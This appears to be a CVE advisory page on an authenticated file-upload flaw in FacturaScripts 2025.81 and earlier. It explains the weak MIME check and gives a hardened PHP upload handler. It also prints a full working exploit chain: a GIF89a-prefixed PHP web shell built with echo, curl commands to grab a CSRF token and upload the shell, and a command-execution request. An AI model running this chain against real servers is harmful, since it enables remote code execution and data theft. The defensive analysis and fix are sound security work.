How the mentioned CVE works:
The vulnerability is in the FacturaScripts product image upload. The `addImageAction()` method in `ProductImagesTrait.php` validates an uploaded file only by checking whether its detected MIME type contains the substring "image/". An attacker with valid credentials can craft a PHP file that begins with the `GIF89a` magic bytes, so the server detects it as image/gif. The code then moves the file using `getClientOriginalName()`, preserving the original `.php` extension, and stores it in the web-accessible `/MyFiles/YYYY/MM/` directory under an auto-incremented name. No further validation rejects executable extensions. Requesting the uploaded `.php` file over HTTP executes it, and a `cmd` parameter turns that into remote command execution. In short: the MIME check only tests for the presence of "image/", which is trivially satisfied; `move()` does not rename the file safely; so a disguised PHP script is saved and executed on the server, leading to full system compromise depending on the web server's permissions.
dailycve form:
Platform: FacturaScripts web app
Version: 2025.81 and below
Vulnerability: Authenticated unrestricted upload
Severity: Critical
Date: May 7 2026
Prediction: Expected patch June
What Undercode Says:
Analytics:
```bash
# Create the disguised file: a GIF header followed by PHP
echo -e 'GIF89a\n<?php system($_GET["cmd"]); ?>' > shell.jpg.php

# Extract the CSRF token from the product edit page
curl -s "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  | grep -o 'multireqtoken" value="[^"]*"' | cut -d'"' -f4

# Upload the disguised PHP file
curl -X POST "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  -F "multireqtoken=YOUR_CSRF_TOKEN" \
  -F "action=add-image" \
  -F "activetab=EditProductoImagen" \
  -F "idproducto=3" \
  -F "newfiles[]=@shell.jpg.php"

# Execute arbitrary commands through the stored file
curl "http://target/MyFiles/2026/03/2.php?cmd=id"
```
Exploit:
Authenticate to FacturaScripts, obtain a CSRF token, then upload a `.php` file with `GIF89a` header. The server stores it as `.php` in a predictable path. Directly call the uploaded file with `?cmd=` to execute system commands.
Protection from this CVE:
Reject any uploaded filename ending with `.php`, `.phtml`, or `.phar`. Generate a random UUID filename and use `finfo` to validate the real content. Store uploads outside the web root and serve them via a secure controller. Never trust `getClientOriginalName()`.
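A hardened version of the upload handling described above, as an added example that is not FacturaScripts' own code: it assumes a Symfony `UploadedFile` (the type `ProductImagesTrait` works with), a storage path outside the web root, and uses a random hex name in place of a UUID; the extension denylist goes slightly beyond the three listed above to cover other PHP-handled extensions.

```php
<?php
// Added example, not FacturaScripts code. Assumes a Symfony UploadedFile ($upload), as used by
// ProductImagesTrait, and STORAGE_DIR outside the web root (the path itself is an assumption).
use Symfony\Component\HttpFoundation\File\UploadedFile;

const STORAGE_DIR = '/var/lib/facturascripts/private-uploads';
// Allowed real content types, each mapped to an extension the server assigns itself.
const ALLOWED_IMAGE_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif', 'image/webp' => 'webp'];

function storeProductImage(UploadedFile $upload): string
{
    if (!$upload->isValid()) {
        throw new RuntimeException('Upload did not complete');
    }
    // Reject PHP-executable extensions anywhere in the client name (catches shell.jpg.php too).
    $clientName = strtolower($upload->getClientOriginalName());
    if (preg_match('/\.(php\d*|phtml|phar|phps|pht)(\.|$)/', $clientName)) {
        throw new RuntimeException('Executable extension rejected');
    }
    // finfo inspects the real bytes; require an allow-listed type, not just the substring "image/".
    // A GIF89a-prefixed script still reports image/gif here, which is why the extension is chosen
    // by the server and the file lives outside the document root, so it can never be executed.
    $realMime = (new finfo(FILEINFO_MIME_TYPE))->file($upload->getPathname());
    if (!isset(ALLOWED_IMAGE_TYPES[$realMime])) {
        throw new RuntimeException('Not an allowed image type: ' . $realMime);
    }
    // Random server-generated name; the client-supplied filename is never reused.
    $storedName = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$realMime];
    $upload->move(STORAGE_DIR, $storedName);
    return $storedName;
}

// Controller-side delivery: only names produced above are accepted, returned as static bytes.
function serveProductImage(string $storedName): void
{
    $path = STORAGE_DIR . '/' . $storedName;
    if (!preg_match('/^[a-f0-9]{32}\.(jpg|png|gif|webp)$/', $storedName) || !is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . array_search(pathinfo($path, PATHINFO_EXTENSION), ALLOWED_IMAGE_TYPES, true));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}
```

The name check in `serveProductImage()` doubles as path-traversal protection, since only the exact filename shape produced by `storeProductImage()` is accepted.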
Impact:
An authenticated attacker can execute arbitrary PHP code on the server, leading to data theft, defacement, persistence, and potential total compromise of the hosting environment.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode